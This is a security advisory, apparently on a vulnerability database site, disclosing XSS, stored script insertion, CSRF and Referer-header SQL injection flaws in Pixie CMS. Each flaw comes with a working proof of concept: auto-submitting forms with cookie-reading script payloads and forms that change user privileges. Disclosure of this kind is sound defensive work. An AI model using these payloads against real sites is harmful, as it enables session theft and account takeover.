Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22468
HistoryJul 01, 2010 - 12:00 a.m.

Multiple Vulnerabilities in Pixie

2010-07-0100:00:00
High-Tech Bridge
www.htbridge.com
18

EPSS

0.007

Percentile

79.7%

JSON

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pixie which could be exploited to perform cross-site scripting, script insertions and cross-site request forgery attacks.

  1. Cross-site scripting (XSS) vulnerability in Pixie
    The vulnerability exists due to input sanitation error in the “keywords” parameter in admin/index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
    Exploitation example:
    <form accept-charset=“UTF-8” action=“http://host/admin/index.php?s=settings&amp;x=site” method=“post” name=“main” >
    <input type=“hidden” name=“sitename” value=“Pixie” />
    <input type=“hidden” name=“url” value=“http://host/” />
    <input type=“hidden” name=“default” value=“blog/” />
    <input type=“hidden” name=“keywords” value=‘key1"><script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“site_auth” value=“sute author” />
    <input type=“hidden” name=“site_cright” value=“copyright” />
    <input type=“hidden” name=“cleanurls” value=“yes” />
    <input type=“submit” name=“settings_edit” id=“form_addedit_submit” value=“Update” />
    </form>
    <script>
    document.getElementById(‘form_addedit_submit’).click( );
    </script>

  2. Script insertion vulnerability in Pixie
    Input passed to the “sysmess” parameter in admin/index.php is not properly sanitized. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when user views the malicious data. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
    Exploitation example:
    <form accept-charset=“UTF-8” action=“http://host/admin/index.php?s=settings&amp;x=pixie” method=“post” name=“main” >
    <input type=“hidden” name=“langu” value=“en-gb” />
    <input type=“hidden” name=“time_zone” value=“+0” />
    <input type=“hidden” name=“dstime” value=“no” />
    <input type=“hidden” name=“dateformat” value=“%Oe %B %Y, %H:%M” />
    <input type=“hidden” name=“rte” value=“1” />
    <input type=“hidden” name=“logs” value=“5” />
    <input type=“hidden” name=“sysmess” value=‘hello message"><script>alert(document.cookie)</script>’ />
    <input type=“submit” name=“settings_edit” id=“form_addedit_submit” value=“Update” />
    </form>
    <script>
    document.getElementById(‘form_addedit_submit’).click( );
    </script>

  3. Cross-site request forgery (CSRF) in Pixie
    The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change credentials and privileges of arbitrary users.
    Exploitation examples:
    <form accept-charset=“UTF-8” action=“http://host/admin/index.php?s=settings&amp;amp;x=users” method=“post” name=“main” >
    <input type=“hidden” name=“uname” value=“myusername” />
    <input type=“hidden” name=“realname” value=“My Real Name” />
    <input type=“text” name=“email” value="[email protected]" />
    <input type=“hidden” name=“user_new” value=“Save” />
    <input type=“hidden” name=“privilege” value=“2” />
    </form>
    <script>
    document.main.submit();
    </script>
    <form accept-charset=“UTF-8” action=“http://host/admin/index.php?s=settings&amp;amp;x=users” method=“post” name=“main” >
    <input type=“hidden” name=“uname” value=“test” />
    <input type=“hidden” name=“realname” value=“test name2” />
    <input type=“hidden” name=“email” value="[email protected]" />
    <input type=“submit” name=“user_edit” id=“sbmtit” value=“Update” />
    <input type=“hidden” name=“privilege” value=“2” />
    <input type=“hidden” name=“user_id” value=“2” />
    </form>
    <script>
    document.getElementById(‘sbmtit’).click();
    </script>

  4. SQL injection vulnerability in Pixie
    The vulnerability exists due to input sanitation error in the HTTP Referer header in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
    Exploitation example:
    GET / HTTP/1.1
    Referer: http://123’SQL_CODE_HERE

This vulnerability was independently discovered by Justin C. Klein Keane in version 1.01 and it was assigned a CVE number CVE-2009-1066.

Related

openvas 2
prion 1
cvelist 1
nvd 1
cve 1
exploitdb 1
openvas
openvas
Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities
2009-03-20 00:00:00
Pixie CMS Multiple Vulnerabilities (Mar 2009) - Active Check
2009-03-20 00:00:00
prion
prion
Sql injection
2009-03-26 05:51:00
cvelist
cvelist
CVE-2009-1066
2009-03-24 19:00:00
nvd
nvd
CVE-2009-1066
2009-03-26 05:51:52
cve
cve
CVE-2009-1066
2009-03-26 05:51:52
exploitdb
exploitdb
Pixie CMS - Cross-Site Scripting / SQL Injection
2009-03-20 00:00:00

EPSS

0.007

Percentile

79.7%

JSON
Related for HTB22468
openvas2prion1cvelist1nvd1cve1exploitdb1